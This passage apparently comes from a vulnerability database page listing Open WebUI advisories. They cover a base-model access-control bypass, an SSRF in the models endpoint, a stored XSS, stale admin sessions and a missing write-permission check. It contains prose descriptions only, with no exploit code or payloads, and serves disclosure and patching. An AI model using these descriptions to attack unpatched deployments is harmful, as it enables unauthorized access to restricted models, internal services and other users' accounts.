Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI supports model composition via base_model_id: a user-defined model (e.g., "Cheap Assistant") can reference an existing base model (e.g., "gpt-4-turbo-restricted") that provides the actual inference capability. When a user queries the composed model, the access control pipeline verifies the user has access to the composed model but never re-verifies access to the chained base model. Additionally, the model creation and import endpoints accept arbitrary base_model_id values without checking that the caller has access to that base model. Combined, this allows any user with the default model creation permission to create a model that chains to a restricted base model — and then invoke it, causing the server to dispatch the request to the restricted base model using the admin-configured API key. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-vz8m-a1dv-zyfw
Aliases: CVE-2024-7959 GHSA-x757-hv69-jr45 |
The `/openai/models` endpoint in open-webui/open-webui version 0.3.8 is vulnerable to Server-Side Request Forgery (SSRF). An attacker can change the OpenAI URL to any URL without checks, causing the endpoint to send a request to the specified URL and return the output. This vulnerability allows the attacker to access internal services and potentially gain command execution by accessing instance secrets. |
Affected by 37 other vulnerabilities. |
|
VCID-w2vd-r3hr-w3bt
Aliases: CVE-2026-44721 GHSA-gf5m-wcrh-7928 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-yysb-dk2k-f7g4
Aliases: CVE-2026-44553 GHSA-45m8-cpm2-3v65 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-ze3m-g96u-27fc
Aliases: CVE-2026-44564 GHSA-vrfh-rj4q-rmhr |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the ydoc:document:update Socket.IO event handler checks whether the sender is a member of the document's Socket.IO room (line 678) but does not verify that the sender has write permission. Users with read-only access join the document room via ydoc:document:join, which only requires read permission (line 520). Once in the room, the user can emit ydoc:document:update events that modify the in-memory Yjs document state and are broadcast to all other collaborators in real time. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||